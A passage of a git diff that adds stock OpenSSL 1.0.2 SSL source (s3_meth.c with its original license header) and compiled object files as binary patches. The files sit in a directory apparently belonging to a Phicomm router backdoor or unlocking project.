+    long alg2 = s->s3->tmp.new_cipher->algorithm2;
+    if (s->method->ssl3_enc->enc_flags & SSL_ENC_FLAG_SHA256_PRF
+        && alg2 == (SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF))
+        return SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256;
+    return alg2;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..edc03d78c3266549638855ac09b9cbabd01ef9ec
GIT binary patch
literal 30696
zcmeI5dwf*YwfIjSV0d(95Y+g>0i#BNGy{l1e9R;>a6$v5JQM^wgk&I*yl!#^5FZQ-
z0geNTtyO-#TDkpc%Wdr~zh56WQj1feB;2bldcBt3K8RjF$~e|i^~NYd?pph-HM3`D
zj)unn?%kiyWbggmYp=cb+K;o(nKQ5{P&GR@Cr9IuqurvVb4)euWLrAz6-lo)P8+Lz
z;2i&n9-C9Gn=k9XOt|!zw_t~!W4;`HA%9!KyQ6fqspp!vuk4yrhm{VY_`wSymB6fT
zai#g;65TwrNRK`5&eb&C{5QR$-*BD8QoXAK8HRZsZyFVP$M20>^v$RH0j$gS#FH})
z9C3lzuIo|6JYiKbMJ2r>Zv0U<yQ<8$bn|x~Jf)jY6oal#?Ar1>eJg|^o$kxXq|PP4
z1@pwC{fpNZn*E)N0qMIgfWMl4ZJ)k2zEsaSMlzc>Rs9vXaiJc2ECPw>0XJyAC_Fs2
zr3ey2YRQ4eMnP5c3>o-*XFj+Qgn_-_iR&G&7;fGC?Xx9N;e#LO<~LE1ZvI7&1q%AB
zUBc8mg(h%`bL$x>U8I|*Ee)}#kdAhq0<0MYI(I)+P=H+>SP<*<LIFB?Scaxp=l;Cx
z{5bK^dQ3Q4sfKnAR2S`x+qJ(B+#px@IrijW+Bq=+tX8^2H=$fxen_~&cf0R4-xA;A
zCFqKUiYcFCDR=y$jA~sG<QR1FUD_3@B)TY55_?}26QfWS+mAl4itXzInX1@c7vy65
z-h~WySJfrP7t2y3_PHKYRiGy^=$6Yo@zh*8L0YR!%QVw6&9qE2g=wZREyEYFpX;zl
zx++?Q)~?7O*fU*`H!0bbr_p?{tT_^`#x<&UMX@S|rMSL)cly5O3yLAzHT$%0Nu~J`
zF7{W&VmCkVRY&`B))nlUeHP;NSLnNbp@Dv3OGiBH40z(6qX&GTERlpi(bHerRMhc%
z=YtKyHLd?&qo+qZw|@<iygF<1zXeP4mj0e-@`mVXuXDRETVbqYA1b^C%VHf7NXJC4
z5*G*}mS1cO_Ona;1pzJb@i0lc2g(v}OGHcjPUOCc){7<W+}edCy0J`ic04BvH`c@O
zJGXuS>O=>leO~92ap%wCiN~RQUdNxq6RiGLfW*Onhd<AcW7&Y`&BWaxRb~Fg8YuG+
z>}=uDRs|gX<V(;QY+jFTD3h0!1<j>p$$Ks7a+H1&+B0^ux=Qmfsw00xJ6hs9@Ta%q
zTcFStz7jT29+Qiz%(q3_QYK^<^!N9tTh|A)US+P-#WYX+e=rsH@bEo)>=(z-*!2F>
z)qwy5nsyAl7(Ln#2EPAKy4kINbWHE>)^8SD{&=hDTR~iLQ(_6|=T7OS(1;z|V%6}2
z^5lzF+6%Q4kDl#^CVtqB>E+M~zxgyy^#pb36r_`5K>!np8?9cRgmk4D&=S`{9?CGE
z7;lyJLAt8;X$@9@5IKTNB=!r$>7GIz1ke`BCH@m^z^z{F_>pcfvDe#LV2l(_PHYAZ
zR%$(@VjYcGrBNj7A&J++VbSjVWL~uAwAq0u@pYk4ETk&)J(M6_*Qaz%f)v<=(<M{n
z{FF$65TO|b!rnsBqrX54>6(^he*{(;{WLGUBzhlA_pJ-gi0Kf4uIRDIK2+2ZcWx~M
z?0XJmHT@&6J0C{M+3_^0<2j8&V?|xDj&w6OkwDL}p>J8uHK$GR98F$C#hzD^#gu#&
zDnY;AfUa3JZc5iUV3kq9l~5pT?)dvpQ#QjT3rvQ7Y!}S3CH8<gmUJ97F2L!TUun*R
zk^W9GC`j~xPK2ZMUAw!XYNfdZ%Jv?HWa2QCSzehbw2{w+ZNoq6?@#On0a!aLMI=i7
z<{Nsfwa_wsv&>(IPCBWRe)ILrzT7S(VIIYJ66HF#9zHF)Rf=Wk-k*qkWH$~1=AROI
zFC5o4xL}4lw|)bFXxRr-JlSM9=YB;?v&iqUwEW(=^=n*7H-9D6&JzMZJ}#Q=HAeFO
zksPPTevIzYJ9>>vnZgmxS!p(DzUQDsOFWFm(VR%+SxuvRtYST;#R_NMsTobe%vpub
zjuW4VPVNC2=YgI}+eU1@Ps;=6Cuc$SGLg;2>}1GZBC<J{y&SR^i!5Hrk`BlgI=6fs
zltu5;a(&K64hNh+dowxA6R)c6xueSLv94#SYnix=ng4|c5WILz(sw<tfeFGa*mJJ6
z_8A}a<{%z&)0=s+G<voyJV`gd5eNC?#ORsf#`)1R!@`AdwMG@NUwV_H(wXYzo;aUX
zeT&Uga5aE)PxM_FwjbfpM$d+w50ybDz!cs5b+qrRn;g+T$ENa*_@;@8E1)2Ha$&UZ
zO6PVL3hnw5n4{^n`J45eZn#?ZcSrla<lO!tt`a)u*5+@aD{0@XP2;0|Go26Jhz<44
zaCW?ia%OBV<P(<&=yi7dvjxRwI1Hd}&78f6WB1k5*x?M@4M_M1dI6U}pYzGXiF;8D
z)|Oj0e<R9taeXtOgZGJx*;ql7^7U@4Zr)jz_&?AS%hBbKI@ke!(vD6{K)s}ru5onn
z!0VPO-3xa2MzKq-@YM9=3}0<EkfjP=3lp8#<=B1FrLW2i=`^9g4TZkvN})yQqjT#+
zC>#Bx)S%040P=})xPV0aW`!p@T{+G%+xG!;x+-1HF%O|?r|YY3=a|R3A({NX)Agh%
z9&@qN^*vEKrpD!T{Rm5)V;bDa9k4BqfUV*pu@R=0k`v0smXRWOD}kB&-iM9o6lP-U
z3sa>h0GKa>p7YF?Gwb~dMWfH-@m4d&z^M~cVuTVS@Iq)-6%|;+7&D3rU`No+D2jw%
zO*{mV9@~yNeZ&jln&j<p$A`Jp3^Cd=?k~DTO%TwM%fK|eTRP904CPidE0a#P=v8n@
zg@(M)o#6=suZXmxz`8PD;|wh9WFE{zJ$l$h3*5TVify;n)%C_Tn?^^^4l~9@&ki>(
zNREu2z16rpdR8|kc;bh2v)Y@y0{&JfFV@Y+a05!ZAkl+~^B{2?5;#KEjUcSp`U7}_
zNjHLZdMy8{V$7TVqNSer>KN2{ds~n5pW`|%(LCgI3mmH|T3V-18!hDdmMwa?UYOen
z(_Cz+SL(3^uGO*IU7q;1_cy-|v|r!+F{%m|tTrzca-s&_K2@5%cpg7v-9-JHuevJs
zJ=}eIw|@)%dc$LUAAwm=R|^l<%?~Qg*WhFo@K~1zzR&c}>~lW24O;M<XPLoOpx0ZL
zZ;YwLV@>LE<T79Y-{U2t$Cki$7jX9myt#&>vSV?P+n8C|;V&vqj>eqJn1s1PqexWx
zNDQlaq$9pz?6NBJqx8Ln^#Gy2E71T`?+#BqT_SpFJykG20OuEGIJ^K(n6d5HVLi6r
zy14fm<Mr4Myrx4};8}rnppHevRsJaY*tE_dddxcMANBP6#M1D`<}UTTqR;GVpQOj8
z7x^EUo#Tu2<rpL3FI-CeuOx?Ai!pj6SC4k(>gM#K<S}R<f?Da26x&efiF<pyMjBUo
zdVQN;&jHtaosS$bPmSm{@{Z)?jd;x%q1T@3j~~gOmJb&>yl#ar@kZWu7~^)e=IFJ3
z(Ri+2+j}H`)-Vtm4m&Eyccc8M99TGzIfj|Bxq57IQ31@SamsuuTy8yS@GZv6+E@Lt
zHQoRm*GFvLq-$Pi?EJ0@KQzjh>dlah&GGNc3Evv+&hfl*5WK0GbNphk=+-mZ`6|+I
zS@a%%UU(r<-2ANqywE0RrJkP%Vcb;az{8IX{qb<OFZyDC@{)bI;e!apUhH|r)7xKN
z-&^6&P5#Mm_S~_Yp5*A!O{La~GcG5Uo_KF=PT1MC1yA;9iL@YN+amy?o#Ou1SP<>Z
z7pBgRc3vhDH=`FsXL=8p8u+N`TC%^ZLeGaCy<glp_D68Vr*D%*3(F6|4uOxk;4y{y
z@2MwTLR%NKisRl9fry*OI{<Q=;JsSDVd$}WZhhvw!th<u4Fy_wg5ONQ$@btySe?W>
z;`iSL6B1RK<po^<oUNeyzCzDY7!i2%#7C0*E1(ej#Wkr`th_*vPCVUJUI1lqF2cJJ
zs~r#&O~K&<_R?10o&7!Hp8k;3C-WtAlCL_WW8!g*)G>M{XFcM84*1NI&;oViL|5b_
zm?bQWRlu;<>#=V{z?5iTfB4$y0W8c7yLBw9m~2%|JK+S#_kU$_a%9&Q6vS|cbW-yi
z6?bzu5Ml);e6USe4=css>#^H$j}mt&v9EVSZRn}qTi%*)IQ5%L<8aN4Xt|p1^uKVZ
zeOj=wVO2@3R#7#7v9@U8Z40&eORB1-%=2GwB^K#EEwHqD%EF520?Ki^Z0eMX@(NLo
zvi`s#k;n2Z>1k8AqF<llU$iJw{_{{q?S+ecYVFTP>DqxTjSqrlDo`6k1)syx3VbL`
zZk5yMLd?sq`;5G$&=*+bnOY`1OC8H3XjKLY2-hn}k-}Cb2}n-8eumP9M5uO}q}q^?
zB1LVmgqVFWKOnEAo2DEIVQxSt31;@df+;h|Lr5!p^8!^>l|IF3SukoGh%KGjcs6<L
zq@8SLFVp=3E78@N{mOu;eknB5!>Ay0ASEKzoU>rj;+fN@U{p4fA`Np>OG`ajFvyC*
zvg)NJWypP|W_Z-HVA*SF=}a%nJe$1iWtLqO2>9h0E9X&%l(!no02vafK2=JiHm719
z4-%~oBGbyILvI6OHy9`@m7t*+b!@9}!GId6d4Q8yvItwj{WY6qTri*t7bvYrGe~NI
zs3MCOtp5%F<2|rwQPsL>?$(+%!`-sly`VMJ48-jzDJ_}mo;uY%x2D-WwbUcNc>6+p
zRb-<D9?NC~H7^%_R+%h^X*!yvFy!$@BE`AfO%j~P!z>1T`ho#ZWO86RW+4BWdRZUG
z_^=AY=jjEdS@p6H*bde^(o&n!TMYRKd{~Z(HK>11dVN%p?M0pVQT2kqK2tB-$?;(I
z!gpj@^@@83$qv>#SU*7hta`a$tdHYtddsBtAt}O$bJRP5>al-OXEwdiepY+gJ~hS%
z`50JlE2Q_qhx><R7~p<Q=;e83=U3K0SU-$DN4<mf13ak8YA@TT#)I{PgY<I!FUk+j
zbJROnKe%l4vi)j2SU-#*z1)A+!}Eso91nIroPUmb2kVEiHhS4UH6E-V;Hz*k&)5&#
ze~wkXgZ0A&=csqEez?#^uWBdf2kQrT@{{2Q-X}O#{gKTN5!h!~4)+`kh3BZ(XH`q>
zXA#KbN7Z|=jb4`H{&PH7doMXhy%WGT47~r^?dzA?=w<uVc(CL4Wzx(2=GZH&f(Kkm
ztm=(GIexevBt?LSkXiR%FO~nTdOf6<>+`xBs@|!Je_8)f^-fdtvY&>kce<jN*V$0@
z!bx6?8{5foM6&|>g=2L-h=~A|xE@v0W{_UClgDkSdT$`TY|j^^7uI3Me#ZKTYVS-%
zFZ*ezdT&(pvY&^lcNXboJ2`f1R)F(`2;AOa?^|xN(d#9Bs$O-TML-TeY!4(wxY<T;
zgvvipuigB;h4gYid7gO(sTbSFk81C&q?hN{7p2!rdRZUq2QI?r`5^*Q_)+ck+4z?Q
zxgCx-gANRQeTzUEKdRnx8~?H(>*IK^dMj-FJ5;@X8~+YfZ$QzT@)ISv{~Qn253?1$
z`7j0|3{meIMK9ayCG~&nJgX<YY$wm-$RPEKaR6i39;&7_kY4uR7p3<u#Sg51sP?W^
z^m2cOs<%<m%YOEfqyE-$YqHThRC}SmxE`ktr0fVXoX3&<zM1;r=NW+V@ZoAytbtsn
zURE$fy<1eh)UcZxW`A>Y{2bA%Sg6_?RrQjBq3YdAdbvH0+23p@$D64iysrzhp;D?I
zm3NR{?k|tiQ1!yQJ!0J0o-a!8cGAoGSpQJ%-J$4B`H33fb~qlae@#U%`+2DLK1zDo
zPL4Hl4BN@EPni!9$m1tf57HPOBfV@V`+2B(_mEz;=Zn${FLH``#`;+QQ0@JeqBrHI
zA^P|46}{}|q1yX6>18`P*62dv6{D+Z+#a9T@g)@u5&ER+A%yURonE&n*1T3UK(CfV
zEuljAsCvJx_#st3M0=mK)9bbj^;*$6+q;+a^8DiYHdO!qgPmTtWvJJR&e`7YD1KnO
zhidQtwbMI9d!Hh`JU_oE|2}P}cZl|WSMdYeJyidG&ra_-+N;f}sJPKxyku3l*$BI5
zmP{)to#MG6EV7>ar<RtKPQTW|)&xWQap~bXXU_a3xGThwiOm&a{7D&xoQ(^$oDHs=
zOGlqqup1UF)`4HaiU7|lML<?cY4|=ygkt#Xr}RA-mpfcLbN!COZFzo&JDQ){<S6tx
zT;&cJc&y(_viw{Z+14x!t}7xGQH*lWQ2J_$3n7kEdM?HRhih9dG!AWH*&nEE6mCNE
z9j<6@?rBGX?~o4JJ}Ub$md$p!9?C6u6h4?&?r`tQFLxC09OiSBZX51%lts_;JG^<1
z<~YiL_#DL`0g}*5(IxR+pdWQWcyT!VsdTt@<pvyuJF)-U^8JqD=rF&dG;iN<M==ne
zR2O|0p}HGU0n{bmRS4hJISMPNp;9P*hGauHcwqC++}Y@7AIf4ARe26Kc%I!Y{M|!!
zZbSVLaJ)YxwhV#pXw9v56rg`c(`EwCWJOp3f8E61L6Y`U0R0rm^i#m$&HcxbjxsPs
z@l#+_rK7B302cix{WH)eF@Dg4Xx<#?&XqZ$FFqVj4d=l#B-;sTtN-B5DEc|~AGzDu
zk5@^q1mz&$TsTQ=HG(xb7w*BSpuzK8EuR*{aV&#A%Hx;&>_{<UvmFKHqol#ZdN)zM
z?_xce5pul>9QS~uG<T<?7zQX+6YVpo9=?l<0oe{>ysmJZ9w!FRT0b|S`|`EF;twJR
zguDS)X-h=>WOslx?hW}_D004AN*Cig&ISGO{7(e22T(ds!v&EUCO{VD--9m(F$mvT
zNzjiYJuu{Hyjx_J<!R!VOPLUIc^Z2$vnWr4Z+n%1<CuP%B(pG2gKx=|0MC)N^Cf@s
z-nfW3=h=dK;5fc&xF0|^zSD;9vEk@Hv`4H7NVBJYPW%OkF))7-(kPEH2HszBuN;$-
zf_EG)7scY=V?g;+R#v;3;$Dc6Ur2k&T;ezZk*_2!_FiBkAfK(jZW}(+hA*<=%We2w
zHhi58-(<tTX~Ulej{RLr`-`}qK!5R<1KIk!--iE+^o*yaC$1%+=QlR;f3)FA8~(8k
z9|d-2vvZsc$Dhz;llRzg{H<*^`I~Kcl?`8M!wnn0%Z7i~h99)yzqR4-+VC?rd@Stc
z+5Av!!@V}V%7!nq;cIR9y*B&-8@>lP&hvL@BN68nn4do&UPl)*aW(<|tc{*u+VGcb
z_-{%7QQA=X9P=LWD`-m>XBlXBIIN#+es<e%4{+?)2GYZ4pGxB2C;krT#<0RhPrD7@
zXv3p6{81bJZQy9<Bh)!@UIKf5Y9rrG^8W%a3}N8w!)rG3Z;|{Kco7Igi4|!d5#LXI
zHE{<V1+w|M5IEX-Azk0anF{J$X(K<~h6il;eA5329*`jL8EPr<CyDd*cNOs;66dp2
z82A|Jys^Vlr)>qEtzWxr_#PYnLmPh7hQDFM`)v4^hG)0)avMG!_!vBo!TyAy*orhQ
z^&_VC_Qq+!_K*>53;kWNHq>SWjk{Yzn!s(Lnz~>^vk_`*u4&Xtswzq?j^gz-&2{bd
zHETn`dXNgWStV(@zOBIsX~8*F3(9>}!3DEtFA6LUF7}mI1%j4nT}#lCsaUwIdhvqb
z>b6iwqjXbEV`ED#$%R(egd4%EhNe(U*sx%8xG7lM&{`jAYq!7}Fv$W|KBEv`qpoXc
zUPDzw>#c-nQ1r95F;vqWZVj#t-5p#74X?EX+CsqFL*N;3!>aJ=)!a)i5cYG4U$?rj
z^!n17!TIo087teqHrU$IYNg97shgrzY(H4nuqM=Qzz@pW4Q)YnU_QL=9TeuY(->ez
zI9I3$u3y#A!Yx|18*Pnft~GWI&7dc6TXnGdD}iOf_J)liEwFH5ur+K1Lv3v>Z5sSK
zqq?nOU5yd?3UszE+=|4q&acCJ=QU03f<kZBgqlNbAc$_!%9qRzwi|6&q0VS*_u#0v
z8LL7yVnD3MVOn^Cwe>X(&1r*xm8z_!u8!nHy|geCkg!tF4kJ+u0~~H^3pHCU;()h@
z+SY~IAZo4)wxX3OKi~{yX<;sc_J%bzjceL96<FTKx~swsjdfOM2KIwGX|%L~Q^Cda
z{MJ%Qxw{!=Rw^T$0lrm;Urz%u0r8Fhsndc@A)~&f4m&U{SPQd%RZZ>MU@eU;AY%jN
zU^<1{>ou5G&|I)N+}Nmz87IwVlpUxdy+VSk?#3Z$(-xG^4X$d3fvl|$3fGAh6>O-}
zf-u;^g8H?=)in)bhD{UG$XZw_6_&yEEiJH4X#J(!D|VB0HH{5*4F-%2SR8J`2vAte
zZn5tOsivCtwXl+*v4&>y0@|CoC!yl0FfEN>D-We;zP&zd)U~V^vkvz%m<=_Ju#;Kd
zgc%cB(_%EhOdbHh4Ix<Vxagq2EI?Zqu9)VQAnXS<Mnel}rzL;45o*_PIj4sRcL}S3
z)=)_7Ai`9baV@YF);CSXX4Xv$hMH@Gbu~tfB?~#N8J!PPpoVrlm^uSDqtt2ySHXr1
z-K=d3Q5Rt_o7b@a<(_~yYZ}p~4ej-5{nogI+8S2horc0=!P=HOYh=RBbs?x1stc|T
zH`k{759_TRoPm1*UP^AK>j@ke#4{%N*KI`TAdZ(Eye2cp`&<kt5AWQj`0EHEp!~(~
zVfm}!{sn`o2mf6L462?siQ}y->xoHxyu_c9_!SZt{{{`|$0G#m5x+|(?w0s_q~|(d
z6D0nDq<^Bs@%{?~+J7Z{SbvekizJTsQy5TQwr8HiuYxkxvrOW${QVM_{j-O-YX1|G
z{6tCrPbDtvKOu3qB#-~p6b7}ww@F;?Z?nX&fqL98ypO<udhjg6{8Nd`_RK>;2pD1C
zSbh_6H1|A-Kd$gnD8o<!=P?XeJPAIm=MITamiS!~pCa*ZNF2}Ftmj#Y<Fh2@uS*<l
zVg6@{yCpsbj(Ql-PB(m5{w9gb{@E;X+5QJ54(|Y`^jwY3f`IyEJqsm{_fp*M3W>wJ
zxhei_iBFgKK8fS6+*r>qB|byq|0;1j<FkCP#LFapO95mcp#AtvkL5!Whj%+u{4t5o
zlK6g!-z4#c@IxaEs2`t=vi^G|4(~Rm_=^(1RpL1#Ap-&Rc;Ul(CP>^T@f##wF7bsD
zuaJ1V#QhQ<NjFy5?sXEsM&j~3`5|#$N7HG)JF4)*#7jnlQV6Jj5`4H{b0sdXmz5Hi
z*UN5+PnPsNA#r&f9hA5%|Ek30_4QYY%km#f+%2^`njT4GzhwS|#O3+(BZ<rN=Ou~D
z^XF}e%kw9fZg{cXIg&kNB(6(*K5-n|N{KI$<R?nJN#gQ4H6$*t)2PJdb^3tB<#qa$
z#N~DR|0FK2$1l@!8JutOIpGfC=!YuF{uYVPlXz0%)e`?e;$M~cc`nF6K>Z8h!}E5s
z#PPcT<~0&uEb)ZI@tGFOKTpqVP`_-agPy-2Un<G}UgFCoel0zJLHRo+K1bqrNPL~d
zzb5e~Bp#Ibeu)=LJQptp5Y%?v5|`V>y%z(@qe}L}M#(?2pHUVAjyrzxr0bu|{lsZ|
zPRVx?r{$aCZ_z$T&8GNINS@43an@6ajY431-X}emSvbXyU<V<%#ox62CnR5_@ZXU<
z`W6H0{|j;4i!d;ElAWa%PVuXVPgnSLbX~`_hJp3`iR{6>2m|w9lDt>YG-tp070%Cz
zanHfPdfp@bxHd5`XTMcjIK_KOezC&YZ@3mPu%5Fdzrw;P{%5j(rNYk;uT%I)IyclS
z{1W1g3NInvs_<Kg8wy`We1pQr)AjORg-;|NQTWxww<`QP;yV;xLVTyfrxM?-@EOD(
zQTUC-_bB`p;*Tr5ocLaa&nEtq!sim-r||j2pHcWv$)Ecb{yOoWDEt)hPKBReV1efp
zK9hJ{;j77>!wSEPc(=lviNC1uHsZ$=zK-~-3g1ZlxWexz{s)C$NaxEQg<nPdO@%)|
zdQK|*LE`T!{3g<KO5rPrf2i=giT5e|1o2N5o=@u<zFH80*ZVcZ@%vT`%x4lWQ1~+9
zqZR&7#9a#i8TEIZ!VeHHRJiyD*1!(&55`IMyg>49Mg9o!B84BO`Btp(6T~Mg{3GK0
zJcRx58tLcrIP>Mi%M?A6=)854!fz(-Rrm|U{R%%qTvzzN5U*1BuZdSH{9fXV75*sk
zr3(KK;wu#XC*ms={s!?ng}+6-Ug7T$Z&dhu#9I~qK5;|g-E@xMpzveF?^XC&(i2g5
zE}c`iD!hmE>`-_w@tq2Hke=NNcTu~KD0~9(Jqn*e{BebQiSJeTL~8dbg<nm4pTe&r
z{*1y)i0@bURN_BT_zdEm3cr!~a|$0vJg)F!;)fN^`nwhG9F4mayep{i0P$lA{|Dl)
zDxBBXafQc7{tpU&h<J~}U!ie%Q{k@>KdEqDU+*fM*Vie9^ZNQw;k>^36wd4GQ-v3i
zJ(l;Z_s;7$12JuX8deKQ+(l{Rt0i72@ih{6OT1p<#S(9jc$viSlDJpmcm$`*npUlF
z?$%0)ucb6bYy;ZgDDe%HM$Uai6v00bkkhTC$jkmgd+7E}TPaE{dE}Q-zEj~>QQn1$
zAz*~^_)HK(y~6pvF0OE&C9W0Xg$M%c!Fy~BtqQNPu-2{cCgN^--phJ665pWkhlw9k
z_*2A-^Q{Ey;r>Sy{u`1%uJAXAm!eZ3u%2EktL;#@0|g-TD10LEGP*BeJvR{Ft?&iJ
zPb$2YxR=hktY-u9Jqq7JoX^E9&-=bk6NvdflHaRv-cS1!ew5^^X(6y4-q-di{4J8_
zR}xvC_lu=;USrPRqwH7sc$zl_blze4Da2PQyo`9K!silq(LTz0RuHdOcnk5k!nY7F
zr0X#2d6;;s!ufj_J}<ER4@llk8wm4fiEmK&uZbU1_<s`T>lo|#n0SP)Z_G!~`Z=y}
zUWcW$8L|8gB)>!93yAk9d=2q3+PqlLJ;Zk_{9)oJ75-h~UV1*pdVWrPkHTLjeoEnQ
z6W3|OWIZ1f->dLZv@i52+)ccCoVD&*&ke-)DSR$*@#QE~Vfi5OrTC?(#9N5(SNJyK
z1s7(@KS6w@!ts4F44n#piMZ<`tDNn5op`;%-yt4X_$R~*3p4eMq<yee;g=HcR`_J%
zZhZI)f$f<|e1pQjLj0J*?<8J)Nv59l#3KrSnD}vpf1h~irI~sT5#OQkKN9az_(#Oc
z=t9i>a?$?2TjAFdKdJCriMuUxQuoD_6~BAHG%j=ed>JzkbSp}6{O$pRVMQs<*T)?S
ze}VFkEBr;u?^pOK${$uZzgOO)@RjHg2%lO}%AU2fU+GlN{o?nj)%zoUKB?X>@O!N4
zd6?fn<?9dY=l4%t)IM{5pOnAHXU^}FZdK&@z0Um#=l3^{E1cic#P^UfV1yrjPqTpb
zC+7S<CcamUfjR#UgU?IM`TfeBiaftxxmV%*ex+8@es_~mvkGFP&5G+e1#ipMlo+86
zhE^ipdnsAf-maCjwO|ItJtZE<qL9TXBZ>hl*%Evo2ViYWQxm=mR?^&Jgi7EyZd1e?
zOO#*J94={XYiWhIfbJ#*p?Y}Dt)?ktIbw)^-B2H=94)t$HZP^#q<x(WXnJy1!{v`#
zqBljXL}|4Z*VB0hFK<|vj#c6}O(=0SaT*RpA{5befb$%y?N5dR)cLp8_ds3LITb!~
z;P#g&j^Xw>4nQSL<GhnYg!V=8zZXaaZYhmPFMP83Z_gcA3W3gF=sz??_1{8Z*uL8T
z_~ig0@cw4yG|kNkiswO`wf)tWKpAxu+sC%m_G^G;YkwuaoCJY?hhyaiw!Z=jvbBGV
zZfg7JoR96}R8rgjJ7Cy;DSYIxXO@+lBtuA3cT(|2iOHgesJ_fF&Gnf-00}fv9sh2s
z?`A=Y*?z{~fduMQ>z}0h{9kjjyjuSWD9Gl&?iQ;C-;bjI@W{*c={S<LZLGNmU*dpJ
vP3sqrl`i<G_3^exoqK?^la=@veiCW3eymdK9zR?CvNlWN85X2i_5XhZ(utQt

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_meth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_meth.c
new file mode 100644
index 0000000..e5a5299
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_meth.c
@@ -0,0 +1,74 @@
+/* ssl/s3_meth.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+#ifndef OPENSSL_NO_SSL3_METHOD
+static const SSL_METHOD *ssl3_get_method(int ver)
+{
+    if (ver == SSL3_VERSION)
+        return (SSLv3_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl3_meth_func(SSLv3_method,
+                         ssl3_accept, ssl3_connect, ssl3_get_method)
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_meth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_meth.o
new file mode 100644
index 0000000000000000000000000000000000000000..8fa134c549b471fb3e66d8da5f5d301b8b9559f3
GIT binary patch
literal 3824
zcmd^>O^6&t6vu0JqFFU&<N6g%jHB@*ex#Xo7o#3zaEXbqh!_Jw#I~oqc6!WA_t0IP
zo%Ikmw}1!%L2?mt@ZiD2UWCQdVlFx4;86&H9CPuYUPQ$8y{`9W-?m*BJzB8){`ISR
zuU@^b>8?+YFTFX{Xee$C^}5>bF;%L4&$jNAvZH3yUiI6|p+7EcsisojBR%=~9i^E$
z{=-!qqW;y=qxK(o{x8~z#l_cJM^1N(#1ySpy?L*FbnaMDcIVE&)b`p7&sl7%u?x&T
z_``CZc>A=PQfd<!m+Jx0*czX_s~Y2djRSjjPhWxuhdu|(5v2~0Mb;+0hpfxsv)`qD
z*{U0F)}9Q^iL=`2)r3gZhR0}1#Niy#Hp<;vkK4krDY(F}>a^@mbW`0m(NZ+k-LgB;
zO|^TXS<Hi&g^V~qu3HB<*0b8)0#L`_bMOxx{9^}SaqtTc{+WY+>EK^G_;(I|-NA1<
z_|FdhmxIsJS%%>q?Vy7{@8EAZ`1=mtbMUc)Uv%)V9Q<1czvkdK99-q|{!p9P3ss&E
z=KY>FWj~G7sZ&em>|h%CQD6dZZegK)YzMbaiC(cH9Oxjkayir5svr#Y$k2o|Npwh^
zOb3z0BdyO`wUYG>`Q>q8qI4y(1DQ^AFE#yuhXwG%SceqAZXnNt9)-bG{O+pJxmZDh
zsGpAl6UKfp&>81xvVol*nz0{FdKf+Ik7Auc1Xz}LJ1QJpCs9A?*-%L_Bxg!xJDQyk
z>E)mp7~k}VIxP%US|?#yew^bM2~6rII`Yq@{m5S~lF;;1s!<pW2HhY$D-tf#-+}GV
zV3vLj@I5HsT7PcY_N0UJ8xoF@x|iml;dd4Cy@Ky2jeJJ%mf-A*=!oF=kw()NoO4F>
